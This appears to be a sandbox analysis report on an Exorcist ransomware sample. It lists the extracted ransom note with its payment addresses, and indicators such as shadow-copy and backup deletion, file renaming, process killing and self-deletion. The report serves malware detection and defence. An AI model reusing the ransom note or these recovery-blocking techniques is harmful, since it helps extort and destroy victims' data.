exorcist | d7d0688022b5848caf5cbabc1bde628cb74f32e014311f5299ed63241fff72b0

Resubmissions

23-09-2020 10:35

200923-mkwlt9yalx 10

23-07-2020 14:59

200723-mtbw6t99d2 10

23-07-2020 13:47

200723-5t3mhtw95x 10

Analysis

max time kernel
145s
max time network
125s
platform
windows7_x64
resource
win7v200722
submitted
23-07-2020 14:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

build-x64-crypt.bin.exe

Score

10^/10

ransomware evasion exorcist persistence

Malware Config

Extracted

Path

C:\Users\Public\Desktop\zcwiYr-decrypt.hta

Family

exorcist

Ransom Note

zcwiYr Decrypt All your data has been encrypted with Exorcist Ransomware. Do not worry: you have some hours to contact us and decrypt your data by paying a ransom. To do this, follow instructions on this web site: http://217.8.117.26/pay Also, you can install Tor Browser and use this web site: http://4dnd3utjsmm2zcsb.onion/pay IMPORTANT: Do not modify this file, otherwise you will not be able to recover your data! Your authorization key: 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

URLs

http://217.8.117.26/pay

http://4dnd3utjsmm2zcsb.onion/pay

Signatures

Exorcist
Ransomware-as-a-service which avoids infecting machines in CIS nations. First seen in mid-2020.
ransomware exorcist
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
1412	bcdedit.exe
1636	bcdedit.exe

Deletes System State backups 3 TTPs 2 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command-Line Interface

T1059

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
1840	wbadmin.exe
572	wbadmin.exe

Modifies extensions of user files 30 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\GroupMount.png.zcwiYr	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\SaveComplete.tiff => C:\Users\Admin\Pictures\SaveComplete.tiff.zcwiYr	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\SendConvertTo.raw.zcwiYr	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\WaitCopy.crw => C:\Users\Admin\Pictures\WaitCopy.crw.zcwiYr	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\AddUndo.png.zcwiYr	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\BlockCompress.tiff	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\BlockWatch.raw => C:\Users\Admin\Pictures\BlockWatch.raw.zcwiYr	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\ReadInitialize.tiff => C:\Users\Admin\Pictures\ReadInitialize.tiff.zcwiYr	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\RenameStart.tif.zcwiYr	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\BlockCompress.tiff.zcwiYr	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\FormatPush.tif => C:\Users\Admin\Pictures\FormatPush.tif.zcwiYr	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\ReadInitialize.tiff	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\SetClear.tiff => C:\Users\Admin\Pictures\SetClear.tiff.zcwiYr	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\WaitCopy.crw.zcwiYr	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\WatchClear.tif.zcwiYr	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\InitializeImport.png.zcwiYr	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\SaveComplete.tiff	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\SetClear.tiff	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\SetClear.tiff.zcwiYr	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\BlockWatch.raw.zcwiYr	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\GroupMount.png => C:\Users\Admin\Pictures\GroupMount.png.zcwiYr	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\SendConvertTo.raw => C:\Users\Admin\Pictures\SendConvertTo.raw.zcwiYr	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\FormatPush.tif.zcwiYr	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\InitializeImport.png => C:\Users\Admin\Pictures\InitializeImport.png.zcwiYr	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\WatchClear.tif => C:\Users\Admin\Pictures\WatchClear.tif.zcwiYr	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\ReadInitialize.tiff.zcwiYr	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\RenameStart.tif => C:\Users\Admin\Pictures\RenameStart.tif.zcwiYr	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\SaveComplete.tiff.zcwiYr	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\AddUndo.png => C:\Users\Admin\Pictures\AddUndo.png.zcwiYr	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\BlockCompress.tiff => C:\Users\Admin\Pictures\BlockCompress.tiff.zcwiYr	build-x64-crypt.bin.exe

Deletes itself 1 IoCs

pid	Process
632	cmd.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\U:	build-x64-crypt.bin.exe
File opened (read-only)	\??\V:	build-x64-crypt.bin.exe
File opened (read-only)	\??\W:	build-x64-crypt.bin.exe
File opened (read-only)	\??\I:	build-x64-crypt.bin.exe
File opened (read-only)	\??\M:	build-x64-crypt.bin.exe
File opened (read-only)	\??\Q:	build-x64-crypt.bin.exe
File opened (read-only)	\??\R:	build-x64-crypt.bin.exe
File opened (read-only)	\??\T:	build-x64-crypt.bin.exe
File opened (read-only)	\??\Z:	build-x64-crypt.bin.exe
File opened (read-only)	\??\B:	build-x64-crypt.bin.exe
File opened (read-only)	\??\E:	build-x64-crypt.bin.exe
File opened (read-only)	\??\L:	build-x64-crypt.bin.exe
File opened (read-only)	\??\P:	build-x64-crypt.bin.exe
File opened (read-only)	\??\N:	build-x64-crypt.bin.exe
File opened (read-only)	\??\O:	build-x64-crypt.bin.exe
File opened (read-only)	\??\S:	build-x64-crypt.bin.exe
File opened (read-only)	\??\X:	build-x64-crypt.bin.exe
File opened (read-only)	\??\A:	build-x64-crypt.bin.exe
File opened (read-only)	\??\G:	build-x64-crypt.bin.exe
File opened (read-only)	\??\J:	build-x64-crypt.bin.exe
File opened (read-only)	\??\K:	build-x64-crypt.bin.exe
File opened (read-only)	\??\Y:	build-x64-crypt.bin.exe
File opened (read-only)	\??\F:	build-x64-crypt.bin.exe
File opened (read-only)	\??\H:	build-x64-crypt.bin.exe

Modifies service 2 TTPs 5 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\d.bmp"	build-x64-crypt.bin.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl	wbadmin.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
832	timeout.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
1632	vssadmin.exe

Kills process with taskkill 91 IoCs

evasion

pid	Process
1388	taskkill.exe
1260	taskkill.exe
1212	taskkill.exe
1828	taskkill.exe
1700	taskkill.exe
572	taskkill.exe
1868	taskkill.exe
1584	taskkill.exe
1948	taskkill.exe
1740	taskkill.exe
1076	taskkill.exe
1580	taskkill.exe
1792	taskkill.exe
784	taskkill.exe
1032	taskkill.exe
1608	taskkill.exe
236	taskkill.exe
216	taskkill.exe
1508	taskkill.exe
1796	taskkill.exe
1520	taskkill.exe
704	taskkill.exe
1976	taskkill.exe
1836	taskkill.exe
232	taskkill.exe
1328	taskkill.exe
1016	taskkill.exe
1404	taskkill.exe
1808	taskkill.exe
1600	taskkill.exe
1492	taskkill.exe
1956	taskkill.exe
1384	taskkill.exe
792	taskkill.exe
212	taskkill.exe
1824	taskkill.exe
1640	taskkill.exe
904	taskkill.exe
1160	taskkill.exe
220	taskkill.exe
1932	taskkill.exe
1940	taskkill.exe
1488	taskkill.exe
1928	taskkill.exe
1768	taskkill.exe
1968	taskkill.exe
1736	taskkill.exe
1776	taskkill.exe
1092	taskkill.exe
1016	taskkill.exe
1976	taskkill.exe
852	taskkill.exe
764	taskkill.exe
1636	taskkill.exe
1536	taskkill.exe
864	taskkill.exe
1816	taskkill.exe
1908	taskkill.exe
1256	taskkill.exe
204	taskkill.exe
1840	taskkill.exe
1768	taskkill.exe
480	taskkill.exe
632	taskkill.exe
1560	taskkill.exe
1572	taskkill.exe
1824	taskkill.exe
1388	taskkill.exe
1000	taskkill.exe
1976	taskkill.exe
1584	taskkill.exe
1928	taskkill.exe
220	taskkill.exe
1400	taskkill.exe
1884	taskkill.exe
1476	taskkill.exe
1484	taskkill.exe
208	taskkill.exe
2024	taskkill.exe
2020	taskkill.exe
1984	taskkill.exe
1520	taskkill.exe
1936	taskkill.exe
1736	taskkill.exe
1484	taskkill.exe
1740	taskkill.exe
1632	taskkill.exe
324	taskkill.exe
1984	taskkill.exe
824	taskkill.exe
1908	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

NTFS ADS 5 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\boot.sys:xbcqjlijd	build-x64-crypt.bin.exe
File created	C:\Users\Admin\AppData\Local\Temp\boot.sys:iykxevszimranzpu	build-x64-crypt.bin.exe
File created	C:\Users\Admin\AppData\Local\Temp\boot.sys:xbcqjlijd	build-x64-crypt.bin.exe
File created	C:\Users\Admin\AppData\Local\Temp\boot.sys:ivrhwmenumbuocvak	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\boot.sys:tpupnbvzicwro	build-x64-crypt.bin.exe

Suspicious behavior: EnumeratesProcesses 406 IoCs

pid	Process
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
2024	powershell.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
2024	powershell.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
